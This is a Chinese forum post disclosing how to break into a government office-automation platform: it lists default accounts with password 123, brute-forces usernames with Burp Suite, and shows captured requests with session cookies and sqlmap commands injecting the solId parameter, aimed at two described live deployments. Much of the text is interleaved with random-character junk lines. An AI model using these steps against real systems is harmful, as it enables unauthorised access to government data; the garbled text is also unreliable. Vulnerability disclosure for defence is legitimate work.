|
8 x+ |, O5 S( e4 c# b- Z, r2 Q/ y
* ^" V& i( p3 Q4 j+ p
) y& K: O D x- n; D) x8 Z1 n+ o m$ t- }: x3 [6 {7 N
平台简介:
) n% o) s5 r5 |7 Y+ x6 y
% j- ~9 D! x( h e
8 h" ~8 F: {+ F& E# T- ^; | o, W/ m1 ?" N8 @
# a4 m: F; i" Z& |2 ^* v. s+ j d& q( M! A- W. y
北京同联信息技术有限公司(以下简称同联)由用友政务与用友原行业事业部团队合伙出资成立。同联以“为全国各级政府单位提供信息化咨询规划、建设解决方案和信息化运维服务,以加强各级政府的精细化、智能化管理,形成高效、敏捷、便民的新型政府。”为使命,致力于为各级政府单位提供专业、标准、灵活、易用的信息化产品及专业的服务。
$ Y2 D3 N' _1 r n- H1 f# ^同联面向政府单位提供专业、标准、灵活、易用的信息化产品。针对各级政府单位,分别提供以“移动政务办公”为主的Da3系列管理软件;针对政法单位提供以“协同办案”为核心的政法协同办案系统等。
) u. F& e. E. L# `
同联本着“协作、专业、创新”的工作方针,为推动各级政府单位信息化、促进各级政府快速转型为 “智慧型政府”做出积极贡献!
" M+ o+ q, D$ M. F
1 F0 X h6 [6 ]7 ]9 i7 [1 _
# u' l0 N7 `, I/ D# T2 O+ b
& `4 b% q$ x$ k& y 4 x' F( K1 v& r& F5 q1 t' o, O
2 v. w% H' k/ Q. A2 | 由于此程序为新开发的程序,故能找到的案例并不多,下面附案例地址:
1 S! b+ j t6 B+ g9 ?9 ~
$ `: e# ]% E8 l% ]/ W, \2 W" R* l* u% o, m1 Q
+ ^: L( T& n2 o, v( U" q
/ }" y/ }" `. E
/ S& L) x9 ?* d5 H5 T http://1.1.1.1:7197/cap-aco/#(案例2-)/ H) I3 D9 m. N
* l0 B+ P S& F
. Y! h F" l0 C! K: ? http://www.XXOO.com (案例1-官网网站)# w2 n! n1 H3 t1 D
( e$ G' s# j" r% d0 w8 Z& f; Q( m; D' }' O* }) f: l1 k( y4 {
2 d2 u- O* ]: b$ Y* B0 k
- A5 t( g: T3 G h5 P" L# c
. ]; ]* k% V1 p) J% v, \8 x2 Y
漏洞详情:
8 |4 D' f# ?( i- v0 b 2 i/ C; n& U. J8 ?6 ~% I. b
# K6 D4 J2 M# a3 g 初步确定平台的默认账号为姓名的首字母小写,初始密码为123,为了能够更好的模拟入侵,使用黑盒测试手段进行测试
4 G( V/ G$ g2 _* K # H7 L6 P, E" r9 [5 o0 ^) B) q8 i" v* x
: q3 q2 U B( J! Q5 H/ j. y9 P) b
首先使用burpsuite代理,然后再用黑客字典生成一个全英文小写的3位字典,利用burpsuite进行暴力破解,破解结果如图:5 S y4 y# Q2 ]: T n
; ^% _1 m& v7 W/ ?
6 E( b5 A4 W; A; U0 H2 y
; y! t3 T; o( u0 f
2 s7 y2 _- B# o" K
7 j2 r' x- v& a/ G9 ^( N  6 }* y+ z W5 X7 }) |) u0 A% o
& e; m( C. {, ~9 P) C
) |, p1 P# o, {% `1 I* ?
status为302即表示破解成功,然后找个破解成功的账号登录系统。经过长时间的手工测试发现在发文管理模块抓包,抓包的数据分别如下:
9 O; E) V( i2 u+ S 3 d* D7 o+ u `5 b" p8 Z
, r- @5 r3 |* ?
1、案例1-官方网站
, _, P+ i2 R- U2 g 1 n/ g/ j0 U1 h! e0 Y: T5 q
8 b* ^" H) G' ? c; D GET /bpmRuBizInfoController/findBpmRuBizInfoBySolId?rows=10&page=0&solId=42b0234e-d5dc-402d-9cef-1ce38cbae480&state=&title=1111&sortOrder=DESC&query=bizTitle_%3D%26URGENCY_%3D%26STATE_%3D%26startTime%3D%26endTime%3D&_=1510060789826 HTTP/1.1
. u7 \1 n% T7 ?9 Y. F3 ] ! g) f, V( f i$ D
3 x* l6 x* J- `4 t/ z. I Host: www.XXOO.com
* q' ~2 }" e- ?7 \0 h9 f c/ q " G7 Q; O: Z' A
8 g" o8 X( \: E; }1 H/ w I0 a Proxy-Connection: Keep-Alive
2 A; i- n* J5 ~. o
0 r. ^- C1 m: k' i8 t Y6 D! r: R% F1 G+ v; b8 j. v' J+ [
Accept: application/json, text/javascript, */*; q=0.01
6 c5 O' ~) z. _' j* a
" j+ s4 c' m2 I* C5 i' T4 |& _# J8 t* i
8 x) L Q5 C4 R+ F% l Accept-Language: zh-CN$ S9 r8 [2 ^/ [& P1 _
1 P h2 t6 Q+ K9 c/ o$ v' J6 z; c; \
Content-Type: application/json* b6 @! R4 ^' M4 `8 F* i
! r+ m. B+ w) I6 `3 g1 d$ x
! y" ?% b0 r8 s4 M( g; {5 R User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0; SE 2.X MetaSr 1.0) like Gecko- o: U! D- P. F
6 z k5 A% i3 T0 p1 K$ Z
5 [- a& j7 B! Z; J* p; ~
X-Requested-With: XMLHttpRequest
; q7 h: r9 W! Q
6 ^1 b( }% S# V$ i
3 J' n( N2 Q/ _( ~5 l B9 W Referer: http://www.XXOO.com/bizRunContro ... 80?modCode=1008M002
1 l1 l6 S: r) v( w* ]- U3 p9 T 3 i: w1 X" G$ d* @2 l
0 V3 }7 H1 g& P$ c' r; p% T9 K Accept-Encoding: gzip, deflate, sdch
, [$ w/ U7 E [+ t ) w9 N" e$ q8 I1 L
. C* @; ?. j0 J- d
Cookie: username=chm; password=123; rememberme=1; autoSubmit=1; sid=2cf5142f-6c1e-4cbb-89d8-2ebd08438b2e
$ R$ W3 J. y2 P' V
/ C, E5 ?$ d x1 i x5 y6 H
' c6 |2 `8 j0 b0 M5 p 将上面post数据包复制到txt文本里保存为tl.txt并将其放到sqlmap根目录下利用sqlmap注入命令为:sqlmap.py -r tl.txt --dbms=mysql --level 5 --risk 3 --tamper=space2hash.py -p solId --is-dba 注入如图:, P8 n* ?5 z, p* A% \$ s; o4 }) M
9 [$ _8 B# G0 P# G! O
5 Z5 k) ]& Z) ^9 |% `+ j0 N: F  7 |# I* t8 { t2 B$ J
b# P% v9 T# n: a
/ n: Y+ U+ J( ^. [9 Y* t5 y' q! n  3 i- g' B+ \8 |2 r
# u; G: V W3 q) i4 C L! B' W+ ~, f' t9 s% Y- k; N
) ]! k+ B) ^# U3 ~* @" e# a
1 q v( l T. J# L- U( E* Q
* T& R6 `: V+ m9 Y5 M2 m# h) s ( V3 B4 h1 t& j3 ^
& O! R. @% Q" m
$ ~* N* r- P$ j9 c% P
4 I+ O. Z. T* A- W0 Z: P
( O" Z% ?7 S- x
2 C* K7 {" Q: ~0 \: W) e* |1 u3 N 2、案例2-某天河云平台1 ^5 e6 \, X' @: q( m2 E
$ z0 o2 o* T9 o
3 t3 j) D( N4 _- E GET /cap-aco/bpmRuBizInfoController/findBpmRuBizInfoBySolId?rows=10&page=0&solId=af056885-4ae5-4e0b-8a0d-c413a786f2db&state=&title=11111&sortOrder=DESC&query=bizTitle_%3D%26URGENCY_%3D%26STATE_%3D%26startTime%3D%26endTime%3D&_=1510047738662 HTTP/1.1
; S6 D3 M m* z- P8 F# j
* Z- P9 q; w$ Y6 s# B* d+ D
) D$ R# }* j9 ]' I" T7 O Host: 1.1.1.:7197+ P0 @, w! N% I' K2 q' [3 }& J
{& x: F3 K4 A- M1 a; L- t4 L! R+ W! m& D7 J5 x
Accept: application/json, text/javascript, */*; q=0.01
$ t3 q" ^7 [# o, @5 J( c% X. N, @ ' F. Y- F: E7 f2 X6 n) r( y, i+ B
+ z& U/ r, h8 o X-Requested-With: XMLHttpRequest
& O% s+ J- d( T- _; d( b ! |& F Y/ T- C. g3 z K1 _
! e3 j# d- z. F User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.221 Safari/537.36 SE 2.X MetaSr 1.0* \4 F+ v+ S! D, C
4 i) g8 O$ F1 t+ ]" g: O5 }
# A: M" m9 B' O# ?; l$ M* U Content-Type: application/json2 ^. P: M" c- h$ [+ D+ k
0 i6 \, z" }/ U/ v6 j
) B& ^; P( I, |9 _: n! S3 l Referer: http://1.1.1.1:7197/cap-aco/bizR ... 86f2db?modCode=1008: Q- [0 s& C+ `3 K
0 b" W! E' P7 Q- u0 }5 k
; }2 U: x/ ^' ~ J Accept-Language: zh-CN,zh;q=0.8
6 W3 m, N7 p5 m. S : }! a5 \# d2 V9 ]9 S) P6 Z% v
2 p" @9 w& o) Z/ F, w Cookie: autoSubmit=1; sid=4e333ec9-d194-456b-bb08-4ff64c6eb1fc; username=lxr; password=123; rememberme=1; autoSubmit=1% k! M3 W' A5 V
5 E6 w2 h, b' o3 Y4 E( D7 C- ?$ o3 `% x/ r: C2 q+ S$ T0 c
Connection: close% x* {, P i1 w0 S, c
- H; Z4 O6 S! F% L
! `8 E5 `8 ~5 E6 H- }: s* T- A2 }8 m; U" P
将上面post数据包复制到txt文本里保存为tl.txt并将其放到sqlmap根目录下利用sqlmap注入命令为:sqlmap.py -r 1.txt --dbms=mysql --level 5 --risk 3 --tamper=space2hash.py -p solId --is-dba 注入如图:( @& O& W6 |8 e2 t3 `' @, C0 T! S/ Z5 j
1 _, G: t7 i2 P: C5 w+ U9 o# m
1 ]" r1 x- n: w# k9 z; N 
8 x0 T' N) r- S |
$ D5 m* Z' K! Y1 c% i9 q' z3 G: r2 K! |
" ]: u$ O S: x1 Q1 f3 @ | 
发表于 2018-10-20 20:15:17
收藏
支持
反对